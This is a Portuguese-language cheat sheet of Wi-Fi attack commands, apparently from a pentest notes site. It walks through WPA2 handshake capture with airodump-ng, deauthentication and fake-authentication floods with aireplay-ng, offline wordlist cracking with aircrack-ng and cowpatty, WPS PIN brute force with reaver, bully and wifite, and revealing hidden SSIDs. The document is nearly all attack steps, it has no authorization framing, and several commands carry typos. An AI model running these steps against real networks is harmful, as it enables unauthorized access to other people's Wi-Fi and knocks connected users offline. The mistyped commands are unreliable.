WI-FI
Quebrando WPA2 pelo PIN
Wifite
Wifite trabalha de forma automatizada, utilizando outras ferramentas como aircrack, bully e reaver.
sudo wifite --wps --wps-onlyOBS.: Caso não consiga quebrar algum senha, adicione o parâmetro --bully.
Todas as senhas quebradas serão adicionadas no arquivo cracked.txt (que tem um conteúdo em json), localizada no mesmo diretório onde foi executado o wifite. Caso não exista esse arquivo, ele será criado automaticamente e caso já exista, ele adiciona a senha.
Bully
bully wlan0mon -b <bssid> -e <ssid> -c <channel>AirCrack
Quebrando WPA-2
Primeiro vamos habilitar a placa de rede no Modo Promíscuo, ou seja, irá ficar escutando todo o tráfego.
Irá ser gerada uma Interface de Rede, por exemplo, se estive utiizando a interface wlan0, será geraro uma interface chamada wlan0man.
sudo airmon-ng start <interface>OBS.: Caso dê erro, digite sudo airmon-ng check kill e depois execute o comando acima novamente.
Exibindo as redes disponíveis (canto superior) e o hosts conectados a essas redes na parte inferior
sudo airodump-ng <interface_gerada>EXPLICAÇÃO
CÓDIGO
DESCRIÇÃO
PWR
É o sinal de força. Quanto maior (mais próximo de 0) a força, mais forte é o sinal
Beacon
É como um pacote que o AP envia periodicamente. O Beacon contém informações sobre a rede. Ele contém o SSID, carimbo de data e hora, intervalo de beacons
#Data
O número de pacotes de dados que foram enviados
#/s
Número de pacotes de dados por segundo
CH
Canal
MB
Velocidade máxima que o AP pode suportar
ENC
Tipo de criptografia
CIPHER
Um desses: CCMP, WRAP, TKIP, WEP, WEP40 ou WEP104. Não é obrigatório, mas o TKIP é normalmente usado com WPA e o CCMP é normalmente usado com WPA2
PSK
O protocolo de autenticação usado. Um dos MGT (WPA / WPA2 usando um servidor de autenticação separado), SKA (chave compartilhada para WEP), PSK (chave pré-compartilhada para WPA / WPA2) ou OPN (aberto para WEP)
ESSID
Nome da rede
Vamos verificar agora as redes e os dispositivos que estão conectados a eles:
sudo airodump-ng --channel <canal_da_rede> --bssid <mac_address_do_AP> --write <nome_do_arquivo_de_saida> <interface_gerada>OBS.: --channel é o mesmo que -c, e --writeé o mesmo que -w.
Agora vamos derrubar uma sessão já ativa, para assim que o host tentar se conectar ao AP, capturarmos o Handshake de 4 vias
sudo aireplay-ng -b <mac_address_do_AP> -h <mac_address_do_host_conectado> <interface_gerada>
# Ou
sudo aireplay-ng --deauth 1 -a <mac_address_do_AP> --ignore-negative-one <interface_gerada>
# Ou
sudo airereplay-ng --deauth 2 -1 <bssid> -c <mac_host_conenctado}> <interface_gerada>EXPLICAÇÃO
O -1 realiza ataque de desautenticação (deauth) e o 2 é a quantidade de segundos que vai utilizar pra fazer a reassociação. Derrubar uma sessão já ativa e assim que o host tentar se conectar ao AP novamente, pegarmos o SSID oculto em que está conectado.
Isso é utilizado tanto em WEP quanto em WPA. Esse método de desautenticação é muito agressivo, enviando um total de 128 quadros para cada desautenticação definida (64 para o AP e 64 para o cliente do AP).
Volte para o outro terminal e verifique se no canto superior direito está escrito: handshake <mac_address_do_AP>.
Caso esteja, pode cancelar todos os terminais, pois agora é hora de usar um Brute Force Offline.
aircrack-ng -a 2 -w <wordlist.txt> <arquivos_salvo.cap>Caso não esteja conseguindo coletar os dados para salvar no arquivo .cap, utilize um ataque de Falsa Autenticação.
Nesse exemplo enviamos um atraso igual a 1000 (fakeauth) e enviar mensagens de autenticação a cada 10 segundos (-q 10)
sudo airereplay-ng --fakeauth 1000 -q 10 -a <bssid> -h <mac_cliente_ap> <interface_gerada>Descobrindo SSID Oculto
sudo airodump-ng <interface>Localize o BSSID (MAC Address do AP), o channel da rede oculta que deseja saber o SSID e pressione CTRL + C para parar o scan de redes.
Bem provável que o SSID esteja mostrando vazio ou algo do tipo <length: 16>.
Agora execute:
sudo airodump-ng --bssid <bssid> --channel <canal> <interface>Abra outro terminal e digite:
sudo aireplay-ng --deauth 1000 -a <bssid> --ignore-negative-one <interface>Agora volte para o outro terminal e veja que o nome SSID irá ser mostrado
OBS.: Depois de pegar o Handshake, podemos realizar o ataque de Brute Force (Offline).
CowPatty
Quebrando WPA
# Caso utilize um wordlist no lugar da tabela rainbow, utilize o seguinte parâmetro: -f {wordlist.txt}
cowpatty -s <ssid> -r <arquivo.cap> -d <tabela_rainbow>Reaver
Instalando
sudo aptitude install reaverQuebrando WPA / WPA2
sudo airmon-ng start wlan0
sudo airodump-ng wlan0monAgora em outro terminal, digite:
sudo reaver -i wlan0mon -c <channel> --bssid <bssid> -vvOBS: --bssid pode ser substituído por -b
Caso apareça umas mensagens de WARNING timeout, acrescente o parâmetro -L no final
Quebrando WPS
# Brute Force para tentar descobrir o PIN (pode demorar horas)
reaver -i wlan0mon -b <bssid> -v
# Quando já se sabe o PIN. Demora cerca de alguns minutos
reaver -i wlan0mon -b <bssid> -p <pin> -vScaneando Redes Wifi disponíveis
sudo iwlist <interface_rede> scan
# Ou
sudo iwlist <interface_rede> scanningl2ping
Verificando dispositivo bluetooth ativo
l2ping <mac_address>Last updated
Was this helpful?